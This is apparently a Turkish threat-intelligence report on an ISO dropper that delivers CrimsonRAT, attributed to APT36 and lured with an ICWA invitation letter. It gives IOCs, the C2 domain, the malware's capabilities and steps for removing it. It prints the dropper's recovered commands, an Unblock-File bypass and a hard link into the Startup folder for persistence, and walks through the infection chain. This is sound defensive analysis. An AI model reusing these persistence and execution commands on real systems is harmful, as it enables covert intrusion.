Manuel Statik Analiz (LLM Okumali) — CrimsonRAT ISO Dropper | Tehdit: KRITIK
APT36 Kampanyasi Tespit Edildi
Bu ornek, APT36 (Transparent Tribe) tarafindan Hindistan merkezli duyu tank kuruluslarina (ICWA — Indian Council of World Affairs) yonelik hedefli bir siber saldiri kampanyasinin parcasidir. Haziran 2026 tarihli lure dosyasi, aktif kampanya oldugunu dogrulamaktadir.

Dosya Kimligi

SHA2568690354fb8a8e640e586b8022392aef9bd58519e4aa9c70f697b82db74ba7d61
Orijinal AdInvitation-Letter-Fazel-Mumbai-House-ICWA-Jun-2026.iso
Boyut4.784.128 byte (~4.5 MB)
FormatISO 9660 CD-ROM imaji

Teslimat Vektoru — ICWA Davet Mektubu Sahteligi

ISO dosyasi, Haziran 2026 tarihli ICWA (Indian Council of World Affairs) davet mektubu olarak sunulmaktadir. Bu tur hedefli phishing (spear-phishing) APT36'nin Hindistanli savunma ve dis politika personeline yonelik tipik TTL'leriyle (Taktik, Teknik, Prosedur) uyumludur. "Fazel Mumbai House" referansi somut bir sosyal muhendislik bilesenini gostermektedir.

Teknik Analiz — Zarli ISO Icerigi

ISO icindeki dosyalar: TLauncher.exe (Minecraft launcher kili#62;), ImgBurn kurulumu, ve C:\ProgramData\z olarak birakilan CrimsonRAT payload.

Tespit Edilen Komutlar (Binary String)

powershell Unblock-File -Path "C:\ProgramData\z"
mklink /h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\TLauncher.exe" "C:\ProgramData\z" >nul
start "" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\TLauncher.exe" && EXIT

Analiz Adim Adim

  1. ISO Bağlanir: Kurban ISO'yu tıklar, Windows otomatik olarak bağlar.
  2. TLauncher kili#62;: Kurban meşru bir Minecraft launcher sandığını düsünür.
  3. PowerShell Bypass: Unblock-File komutu ile indirme engeli kaldirilir.
  4. Kalicilik: C:\ProgramData\z adli payload, Startup klasorune TLauncher.exe adi altinda sabit baglanti (hard link) olarak eklenir.
  5. Yürütme: Payload calistirilir ve sistem yeniden baslatildiginda da otomatik olarak calisir.

C2 Altyapisi

CrimsonRAT C2 URL'si binary icerisinde sifreli olarak saklanmaktadir. ISO icindeki TLauncher bileseninden http://java-for-minecraft.com/ URL'si tespit edilmis; bu adres Java kurulumu rehber linki olarak kullanilmaktadir. Asil CrimsonRAT C2 endpoint'i statik analizde gorunur degildir.

IOC

SHA2568690354fb8a8e640e586b8022392aef9bd58519e4aa9c70f697b82db74ba7d61
ISO AdiInvitation-Letter-Fazel-Mumbai-House-ICWA-Jun-2026.iso
Payload YoluC:\ProgramData\z
Kalicilik Yolu%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\TLauncher.exe
PowerShell KomutuUnblock-File -Path "C:\ProgramData\z"
C2Sifrelenmis (dinamik analiz gerekli)
Hedef KurumICWA — Hindistan dis politika think-tank

Bilinen CrimsonRAT Yetenekleri

  • Tam uzaktan erisim (dosya yonetimi, komut yürütme)
  • Ekran goruntüsü alma
  • Keylogger
  • Tarayici kimlik bilgileri calma
  • Dosya yükleme/indirme
  • Process yonetimi

Nasil Kaldirilir?

  1. %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ altindaki TLauncher.exe silinsin
  2. C:\ProgramData\z dosyasi silinsin
  3. Registry Run key'leri kontrol edilsin
  4. Guncel AV taramasi yapilsin

CrimsonRAT — Malware Profile

CrimsonRAT APT36 Transparent Tribe Pakistan 2017. ICWA Mumbai Hindistan diplomatik lure. java-for-minecraft.com. .NET+Delphi.

Malware Type
RAT
Programming Language
.NET
C2 Protocol
TCP
Target Systems
Hindistan, Pakistan — hukumet, savunma, think-tank

Capabilities & Behavior

Uzaktan Erişim & Kontrol
Keylogger
Ekran Görüntüsü
Webcam Erişimi
Dosya Yönetimi
Süreç Yönetimi
Komut Yürütme
Kalıcılık Mekanizması

IOC List (1 indicators)

IOC — CrimsonRAT
# SHA256 8690354fb8a8e640e586b8022392aef9bd58519e4aa9c70f697b82db74ba7d61
TypeValueNote
sha256 8690354fb8a8e640e586b8022392aef9bd58519e4aa9c70f697b82db74ba7d61

C2 Servers (2 recorded servers for this family)

Address Type Port Protocol Status Country
java-for-minecraft.com domain 80 HTTP active —
java-for-minecraft.com domain 80 HTTP active —

C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.

Tags
crimsonratapt36iso-droppertlauncher-lurepowershell-bypassindia-targetaptsaldiriicwa